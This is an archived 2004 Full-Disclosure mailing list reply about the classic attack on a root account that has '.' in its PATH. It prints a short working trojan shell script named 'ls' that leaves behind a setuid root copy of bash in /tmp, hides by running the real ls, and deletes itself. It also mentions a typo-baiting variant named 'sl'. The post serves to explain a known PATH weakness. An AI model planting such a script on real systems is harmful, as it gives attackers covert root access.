| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <200412012203.iB1M3hiN007407@turing-police.cc.vt.edu> From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks@...edu) Subject: Old LS Trojan? On Wed, 01 Dec 2004 15:11:46 EST, "David S. Morgan" said: > I am looking for an old LS trojan, with trojan being a misnomer. Essentially , the scinario is that the admin (root) has a . (dot) in his path. Geez. I don't have it, but it's easy enough to write. % cat > ./ls !!/bin/bash /bin/cp /bin/bash /tmp/foobar /bin/chmod 4755 /tmp/foobar /bin/ls $* /bin/rm -f $0 ^D % chmod +x ./ls (Fix the shell magic and lack of > and 2> redirects yourself. Bonus points for wrapping a check for $USER == root around the first 2 lines, and even more for doing the *right* check ;) And no, there's nothing in most "modern" unixoids that will "prevent" this attack, other than not having '.' in the $PATH by default. Incidentally, '.' at the front of $PATH is more dangerous for this, but I know of at least one case where the sysadmin had '.' at the *end* and thought himself safe - the attacker called it './sl' and waited for a typo (insider job, attacker knew the admin was a poor typist ;) -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 226 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20041201/4e42eb24/attachment.bin
Powered by blists - more mailing lists